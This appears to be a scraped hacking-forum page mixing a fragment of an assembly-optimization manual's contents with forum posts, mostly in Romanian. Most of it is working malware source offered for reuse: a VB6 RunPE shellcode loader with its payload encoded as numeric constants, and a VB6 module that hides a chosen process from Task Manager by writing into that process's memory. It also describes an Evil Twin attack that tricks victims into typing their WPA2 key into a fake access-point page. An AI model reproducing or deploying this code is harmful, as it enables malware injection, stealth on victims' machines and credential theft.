processors)....................................................................................... 148 16.17 FSQRT (SSE processors)................................................................................... 148 16.18 FLDCW (Most Intel processors) .......................................................................... 148 17 Special topics .............................................................................................................. 149 17.1 XMM versus floating point registers ...................................................................... 149 17.2 MMX versus XMM registers .................................................................................. 150 17.3 XMM versus YMM registers .................................................................................. 150 17.4 Freeing floating point registers (all processors)..................................................... 150 17.5 Transitions between floating point and MMX instructions...................................... 151 17.6 Converting from floating point to integer (All processors) ...................................... 151 17.7 Using integer instructions for floating point operations .......................................... 152 17.8 Using floating point instructions for integer operations .......................................... 155 17.9 Moving blocks of data (All processors).................................................................. 156 17.10 Self-modifying code (All processors) ................................................................... 157 18 Measuring performance............................................................................................... 158 18.1 Testing speed ....................................................................................................... 158 18.2 The pitfalls of unit-testing ...................................................................................... 160 19 Literature..................................................................................................................... 160 20 Copyright notice .......................................................................................................... 160 Download: http://agner.org/optimize/optimizing_assembly.pdf

[VB6] shRunpe [fully standalone Runpe shellcode] --by hamavb Author: [h=3]hamavb[/h] As the title says, this's a fully standalone Runpe shellcode (i assume that you know what Runpe is. if not, try google it then come back and read this thread). and ofcorse the shellcode can be used in any programming language, you just have to convert it. 'Author : hamavb 'First cut : 02/03/2012 16:50 'Credits : karcrack & cobein Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte) Dim Asm(160) As Currency Asm(0) = 3011782251321.1488@ Asm(1) = 2842944510165.0021@ Asm(2) = 21475170.7244@ Asm(3) = 3039972698908.2734@ Asm(4) = 0.0108@ Asm(5) = 0@ Asm(6) = 0@ Asm(7) = 0@ Asm(8) = 0@ Asm(9) = 0@ Asm(10) = 770918988510973.1328@ Asm(11) = 609196292101137.4146@ Asm(12) = 318076019310180.1508@ Asm(13) = -857485367476117.5446@ Asm(14) = 399392180.8913@ Asm(15) = -706833318868351.5511@ Asm(16) = 6879439133396.1731@ Asm(17) = 763810498335316.3776@ Asm(18) = 388654513.6166@ Asm(19) = 98506041997.169@ Asm(20) = 24964196938431.9488@ Asm(21) = 22034984796.16@ Asm(22) = 305625529718164.0704@ Asm(23) = -410459675325501.5192@ Asm(24) = -172419915909691.6991@ Asm(25) = 150655457759015.8157@ Asm(26) = 763810498295053.1535@ Asm(27) = -334758189796557.4082@ Asm(28) = 763810498175933.6042@ Asm(29) = 769693235337619.0272@ Asm(30) = 658651445508203.5218@ Asm(31) = 93228415366.4744@ Asm(32) = 337544363.4688@ Asm(33) = -171181400105556.1333@ Asm(34) = -43143787013419.7499@ Asm(35) = -843073848963811.6758@ Asm(36) = 586115344006226.9449@ Asm(37) = 81903309047.8335@ Asm(38) = -170655782147139.7888@ Asm(39) = -296106572219468.926@ Asm(40) = -171744351251070.9758@ Asm(41) = 478565684273270.0365@ Asm(42) = 766128157362243.3@ Asm(43) = 763822153521118.6688@ Asm(44) = -5798494293561.088@ Asm(45) = 292876624.968@ Asm(46) = -303308424893800.028@ Asm(47) = 18687314406408.1922@ Asm(48) = -814921249263117.9264@ Asm(49) = 377936345376908.9026@ Asm(50) = 914455950214871.0911@ Asm(51) = 793381819255881.7282@ Asm(52) = 247979454486563.4385@ Asm(53) = -842580059571706.7544@ Asm(54) = 261953043.9225@ Asm(55) = 1351124663940.1355@ Asm(56) = -5728895679889.4336@ Asm(57) = 16435523184027.2177@ Asm(58) = 453291086712582.9632@ Asm(59) = -171181401297649.6638@ Asm(60) = 247984901789109.5093@ Asm(61) = 763853927511347.5304@ Asm(62) = 68764336814004.0238@ Asm(63) = 377880083361326.677@ Asm(64) = 58153857883.8015@ Asm(65) = -170634502550313.984@ Asm(66) = -6846382739763.962@ Asm(67) = 217285200.5584@ Asm(68) = 273152312385105.8024@ Asm(69) = 13733354816300.6466@ Asm(70) = 764000768607145.1648@ Asm(71) = 17395153563837.4458@ Asm(72) = -353751767489869.7902@ Asm(73) = 763363.3281@ Asm(74) = 392094642558210.6624@ Asm(75) = 764766522162398.7432@ Asm(76) = 126410412043612.3678@ Asm(77) = 27351427555.8027@ Asm(78) = 11706747011255.5776@ Asm(79) = -757276053642969.088@ Asm(80) = 360268856045024.0513@ Asm(81) = 749398978656993.7514@ Asm(82) = 12354147786351.6251@ Asm(83) = 769693219347778.7648@ Asm(84) = 414640788194904.6822@ Asm(85) = -171181417231738.2261@ Asm(86) = 276807880992725.4373@ Asm(87) = -842805239553082.2424@ Asm(88) = 37043291672.0721@ Asm(89) = 507392545273423.744@ Asm(90) = 769258247064186.1864@ Asm(91) = 68764336812483.5886@ Asm(92) = 360268875651665.0832@ Asm(93) = 749398978495932.017@ Asm(94) = 9651988025294.3009@ Asm(95) = 769693219347778.7648@ Asm(96) = 126410412042563.7942@ Asm(97) = -171294008471547.0205@ Asm(98) = -387449256181707.5451@ Asm(99) = 363299752439103.6175@ Asm(100) = -410459675325517.2888@ Asm(101) = -172926570866094.7199@ Asm(102) = -635688100489173.3787@ Asm(103) = 763810497261576.6376@ Asm(104) = 126410412042144.3634@ Asm(105) = -843073849903335.4646@ Asm(106) = 769693215773368.7817@ Asm(107) = 414640788193698.8194@ Asm(108) = 4951342415221.7475@ Asm(109) = 4636260512845.0048@ Asm(110) = -171631782205882.368@ Asm(111) = 507388721888441.1549@ Asm(112) = 31815578412492.9256@ Asm(113) = -872572382190820.8041@ Asm(114) = -286501654647065.8048@ Asm(115) = -428658242031485.5343@ Asm(116) = 3149895693349.6588@ Asm(117) = 22752143878461.8496@ Asm(118) = 10655039450.0177@ Asm(119) = 19434514006.2976@ Asm(120) = 2249161163731.9936@ Asm(121) = 590215178835617.3824@ Asm(122) = -171519195984216.1688@ Asm(123) = 334471606820667.3981@ Asm(124) = -6937148713125.7624@ Asm(125) = 3006614124114.7186@ Asm(126) = 457802337043140.7336@ Asm(127) = 34749504.673@ Asm(128) = -843073850212036.239@ Asm(129) = 536232810004781.4409@ Asm(130) = 699902812802672.356@ Asm(131) = -439434742750697.5805@ Asm(132) = 756604737376275.6714@ Asm(133) = 869968633553.1604@ Asm(134) = 450404738465.792@ Asm(135) = -7194094211452.1344@ Asm(136) = -1353710065018.4752@ Asm(137) = -439079356974065.2545@ Asm(138) = 566676858034822.4232@ Asm(139) = 32602016.4622@ Asm(140) = -7089160921751.4365@ Asm(141) = 410061545662244.4496@ Asm(142) = 617979275378688@ Asm(143) = 725985904952471.1762@ Asm(144) = 854193482151915.9435@ Asm(145) = -842159216757581.13@ Asm(146) = 457592490565246.7766@ Asm(147) = 17684902147728.7019@ Asm(148) = 643884385768544.0491@ Asm(149) = 622040492439682.185@ Asm(150) = 842553683379673.7879@ Asm(151) = 865826324060815.6483@ Asm(152) = 233132869356380.6979@ Asm(153) = -841594865717950.1309@ Asm(154) = -598169487549740.1085@ Asm(155) = 22006038477175.2068@ Asm(156) = 843978581769276.108@ Asm(157) = -840178504924852.7391@ Asm(158) = -836852911227146.7764@ Asm(159) = 643884385767650.3812@ Asm(160) = 328436.0538@ CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0 End Function Usage example : ShRunPE "Target Exe Path", "PE data as byte()" Sursa: http://www.hackhound.org/forum/topic/43748-shrunpe-fully-standalone-runpe-shellcode-by-hamavb/

[VB6] HideProcess without Driver Author: [h=3]f0rce[/h] Credits: Mrfrog SqUeEzEr Attribute VB_Name = "mHideProcess" '--------------------------------------------------------------------------------------- ' Module : mHideProcess ' ' Author : f0rce ' ' Credits : Very Big Thanks to SqUeEzEr & Mrfrog ' ' Mail : f0rce@hotmail.de ' ' Published : 17/03/2011 ' ' Purpose : Hide a Process without Driver or other things ' ' Compile in P-Code then it works ' ' ' ' License : You can use this code in your own applications, share the source... ' ' Don't forget to leave credits or assume you're an asshole. ' '--------------------------------------------------------------------------------------- Option Explicit Option Base 0 '// @kernel32.dll Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Private Declare Function VirtualFreeEx Lib "Kernel32.dll" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long Private Declare Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Public Declare Function GetLastError Lib "kernel32" () As Integer '// @user32.dll Private Declare Function SetTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long Private Declare Function KillTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long) As Long Private Declare Function FindWindowA Lib "user32.dll" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function SendMessageA Lib "user32.dll" (ByVal Hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function GetClassNameA Lib "user32.dll" (ByVal Hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long Private Declare Function SetWindowLongA Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function CallWindowProcA Lib "user32.dll" (ByVal lpPrevWndFunc As Long, ByVal Hwnd As Long, ByVal msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function EnumChildWindows Lib "user32.dll" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long Private Declare Function RegisterWindowMessageW Lib "user32.dll" (ByVal lpString As Long) As Long Private Declare Function RegisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal Hwnd As Long, lpdwProcessId As Long) As Long Private Declare Function DeregisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long '// Types Private Type POINTAPI x As Long y As Long End Type Private Type LVFINDINFO flags As Long psz As Long lParam As Long pt As POINTAPI vkDirection As Long End Type '// Consts Private Const LISTVIEW_CLASSNAME$ = "SysListView32" Private Const TASKMANAGER_CLASSNAME$ = "#32770" Private Const MEM_COMMIT& = &H1000 Private Const MEM_RESERVE& = &H2000 Private Const MEM_RELEASE& = &H8000& Private Const GWL_WNDPROC& = -&H4& Private Const PAGE_READWRITE& = &H4& Private Const LVFI_WRAP& = &H20 Private Const LVM_FIRST = &H1000 Private Const LVM_FINDITEM = (LVM_FIRST + 13) Private Const LVM_DELETEITEM& = &H1008 Private Const PROCESS_VM_READ& = &H10 Private Const PROCESS_VM_WRITE& = &H20 Private Const PROCESS_VM_OPERATION& = &H8 Private Const HSHELL_WINDOWCREATED& = &H1 Private Const HSHELL_WINDOWDESTROYED& = &H2 Private Const LVM_GETITEMTEXT = (&H1000 + 45) '// Variables Private lngLVHWND& Private lngWinHook& Private lngReferenceHwnd& Private WM_SHELLHOOKMESSAGE& Dim bytProcess2Hide() As Byte Public Sub StartHideProcessHook(ByVal lngRefHwnd&, ByRef strProcessName$) Dim lngTskMngrHwnd& If lngRefHwnd And LenB(strProcessName) > 0 Then If lngWinHook = 0 Then Debug.Print "Hook Started -> "; Time$ bytProcess2Hide = StrConv(strProcessName, vbFromUnicode) lngReferenceHwnd = lngRefHwnd lngTskMngrHwnd = FindWindowA(TASKMANAGER_CLASSNAME, vbNullString) If lngTskMngrHwnd Then StartFindLV lngTskMngrHwnd End If WM_SHELLHOOKMESSAGE = RegisterWindowMessageW(StrPtr("SHELLHOOK")) lngWinHook = SetWindowLongA(lngReferenceHwnd, GWL_WNDPROC, AddressOf WinProc) RegisterShellHookWindow lngReferenceHwnd End If End If End Sub Public Sub StopHideProcessHook() If lngReferenceHwnd Then If lngWinHook Then Debug.Print "Hook Stoped -> "; Time$ SetWindowLongA lngReferenceHwnd, GWL_WNDPROC, lngWinHook DeregisterShellHookWindow lngReferenceHwnd StopTimer lngWinHook = 0 End If End If End Sub Private Function WinProc(ByVal Hwnd&, ByVal uMsg&, ByVal wParam&, ByVal lParam&) As Long If uMsg = WM_SHELLHOOKMESSAGE Then Select Case wParam Case HSHELL_WINDOWCREATED Debug.Print "New Window -> Classname: "; GetWinClassName(lParam), " -> "; Time$ If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then StartFindLV lParam 'Debug.Print "TaskManager Open -> "; Time$ End If Case HSHELL_WINDOWDESTROYED 'Debug.Print "Window Closed -> Classname: "; GetWinClassName(lParam), " -> "; Time$ If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then '// SetTimer = False StopTimer 'Debug.Print "TaskManager Closed -> "; Time$ End If End Select End If WinProc = CallWindowProcA(lngWinHook, Hwnd, uMsg, wParam, lParam) End Function Private Sub TimerProc(ByVal lngHwnd&, ByVal nIDEvent&, ByVal uElapse&, ByVal lpTimerFunc&) HideProcess End Sub Private Sub StartFindLV(ByVal lngHwnd&) EnumChildWindows lngHwnd, AddressOf SearchListView, 1 End Sub Private Function SearchListView(ByVal lngHwnd&, ByVal lParam&) As Boolean If GetWinClassName(lngHwnd) = LISTVIEW_CLASSNAME Then Debug.Print "LV finded -> "; Time$ lngLVHWND = lngHwnd '// SetTimer = True SetTimer lngReferenceHwnd, 0, 20, AddressOf TimerProc Else SearchListView = True End If End Function Private Function GetWinClassName(ByVal lngHwnd&) As String Dim lngRet& GetWinClassName = String$(&H100, vbNullChar) lngRet = GetClassNameA(lngHwnd, GetWinClassName, &H100) GetWinClassName = Left$(GetWinClassName, lngRet) End Function Private Sub StopTimer() KillTimer lngReferenceHwnd, 0 End Sub Private Sub HideProcess() Dim pHandle As Long, ProcessID As Long Dim pStrBufferMemory As Long, pMyItemMemory As Long Dim LFI As LVFINDINFO, lWritten As Long Dim a As Long If lngLVHWND = 0 Then Exit Sub GetWindowThreadProcessId lngLVHWND, ProcessID pHandle = OpenProcess(&H1F0FFF, False, ProcessID) pMyItemMemory = VirtualAllocEx(pHandle, 0&, LenB(LFI) + 513, &H1000, &H40) LFI.flags = LVFI_WRAP LFI.psz = pMyItemMemory + Len(LFI) Call WriteProcessMemory(pHandle, ByVal pMyItemMemory, ByVal VarPtr(LFI), Len(LFI), ByVal VarPtr(lWritten)) Call WriteProcessMemory(pHandle, ByVal (pMyItemMemory + Len(LFI)), ByVal VarPtr(bytProcess2Hide(0)), UBound(bytProcess2Hide) + 1, lWritten) a = SendMessageA(lngLVHWND, LVM_FINDITEM, -1, ByVal pMyItemMemory) If a > -1 Then SendMessageA lngLVHWND, &H1000 + 8, a, 0& VirtualFreeEx pHandle, pMyItemMemory, 0&, MEM_RELEASE CloseHandle pHandle End Sub Userland hooking. Download: http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=11183

Malwr analysis Link: http://malwr.com/

Exploit-ul e public.

Hacking WPA 2 Key - Evil Twin Method (No Bruteforce) Video made by TechnicDynamic, click and subscribe to his channel! Canalul utilizatorului technicdynamic - YouTube Description In an ealier post, we've seen how to crack WPA-2 network keys using a dictionary. While that technique works, it could take an awful long time, especially when brute forcing. On this technique, named 'Evil Twin', we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point - which looks exactly like his. When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually. For this example I created a service page, started apache and mysql to store the keys typed in a database. Song: BGNS - Sasas Original article: Technic Dynamic | Hacking WPA 2 Key – Evil Twin (No Bruteforce) Oblivion | Facebook http://www.TechnicDynamic.com * Video made under controlled circumstances for educational purposes.

Pfff, amintiri Insa cel putin acum 4-5 ani faceam cate ceva "util".

Dau avertisment pentru ca ai postat intr-o categorie gresita.

"Here I have ... meterpreter reverse_tcp payload custom encoded by me" Da, ai sarit peste ce era mai important.